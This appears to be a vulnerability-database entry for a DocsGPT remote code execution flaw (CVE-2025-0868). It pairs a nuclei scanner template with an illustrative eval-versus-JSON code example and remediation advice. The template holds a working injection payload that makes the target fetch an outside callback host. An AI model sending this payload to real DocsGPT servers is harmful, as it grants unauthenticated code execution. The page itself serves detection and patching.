DocsGPT - Unauthenticated Remote Code Execution

04 Jul 2026 03:00:48 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Vulnerability in DocsGPT allows unauthorized Remote Code Execution via JSON data parsing flaws.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| BDU FSTEC | The vulnerability of the eval() function on the DocsGPT software platform allows a perpetrator to execute any Python code. | 24 Nov 2025 00:00 | bdu_fstec |
| Circl | CVE-2025-0868 | 20 Feb 2025 14:49 | circl |
| CNNVD | DocsGPT security vulnerability | 20 Feb 2025 00:00 | cnnvd |
| CVE | CVE-2025-0868 | 20 Feb 2025 11:26 | cve |
| Cvelist | CVE-2025-0868 Remote Code Execution in DocsGPT | 20 Feb 2025 11:26 | cvelist |
| Exploit DB | DocsGPT 0.12.0 - Remote Code Execution | 9 Apr 2025 00:00 | exploitdb |
| GithubExploit | Exploit for CVE-2025-0868 | 25 May 2025 13:14 | githubexploit |
| Github Security Blog | DocsGPT Allows Remote Code Execution | 20 Feb 2025 12:31 | github |
| NVD | CVE-2025-0868 | 20 Feb 2025 12:15 | nvd |
| OSV | CVE-2025-0868 | 20 Feb 2025 12:15 | osv |

id: CVE-2025-0868

info:
  name: DocsGPT - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A vulnerability that could result in Remote Code Execution (RCE) has been found in DocsGPT. Due to improper parsing of JSON data using eval(), an unauthorized attacker could send arbitrary Python code to be executed via the /api/remote endpoint. This issue affects DocsGPT from 0.8.1 through 0.12.0.
  impact: |
    Unauthenticated attackers can execute arbitrary Python code remotely on DocsGPT servers through improper eval() usage, leading to complete system compromise and potential access to all indexed documents and API keys.
  remediation: |
    Upgrade to DocsGPT version 0.12.1 or later that addresses the eval() vulnerability.
  reference:
    - https://cert.pl/posts/2025/02/CVE-2025-0868/
    - https://cert.pl/en/posts/2025/02/CVE-2025-0868/
    - https://github.com/arc53/DocsGPT
  classification:
    epss-score: 0.15099
    epss-percentile: 0.96328
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Welcome to DocsGPT"
  tags: cve,cve2025,docsgpt,unauth,rce,vkev,vuln

http:
  - raw:
      - |
        POST /api/remote HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=1&source=reddit&name=other&data={"source":"reddit","client_id":"1111","client_secret":1111,"user_agent":"111","search_queries":[""],"number_posts":10,"rce\\\\":__import__('requests').get('http://{{interactsh-url}}/')}#":11}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '"task_id":'
          - '"status":'
        condition: and
# digest: 4a0a00473045022034bbaccae4e5f7b36a6909c57cf7b6622d916ef3f99e57cc631b371b3c2cd78d02210091fc5a3244a05109b5d12c73055e147f831a513c6bdc99f4ca66575da5f8fa30:922c64590222798bb761d5b6d8e72950
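
The flaw class named in the template description, parsing a request field with eval() instead of a JSON parser, shown next to the hardened form. This is an added example, not DocsGPT's code and not part of the template; `parse_unsafe`, `parse_safe`, `record` and both sample inputs are constructed for illustration.

```python
import json

# Constructed stand-in for a side effect, so the demo can show that code ran.
SIDE_EFFECTS = []


def record(marker):
    """Hypothetical helper: remembers that it was called."""
    SIDE_EFFECTS.append(marker)
    return marker


def parse_unsafe(data: str):
    """Vulnerable pattern: eval() treats the field as Python source code."""
    return eval(data)


def parse_safe(data: str):
    """Hardened pattern: json.loads() only builds data and never runs code."""
    try:
        parsed = json.loads(data)
    except json.JSONDecodeError as exc:
        raise ValueError(f"rejected non-JSON input: {exc.msg}") from None
    if not isinstance(parsed, dict):
        raise ValueError("expected a JSON object")
    return parsed


# Constructed inputs. Both look like a config object to a casual reader.
BENIGN = '{"source": "reddit", "number_posts": 10}'
# One value is a function call, which is valid Python but not valid JSON.
HOSTILE = '{"source": "reddit", "number_posts": record("evaluated")}'


if __name__ == "__main__":
    print("safe, benign   :", parse_safe(BENIGN))
    print("unsafe, hostile:", parse_unsafe(HOSTILE))
    print("side effects   :", SIDE_EFFECTS)  # the embedded call executed
    try:
        parse_safe(HOSTILE)
    except ValueError as err:
        print("safe, hostile  :", err)
```

The same check is useful in code review: any request-derived string reaching `eval()` or `exec()` is a finding regardless of which endpoint carries it.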


04 Feb 2026 07:00 (current)
Vulners AI Score: 7.5 (High risk)
CVSS 4: 9.3
EPSS: 0.15099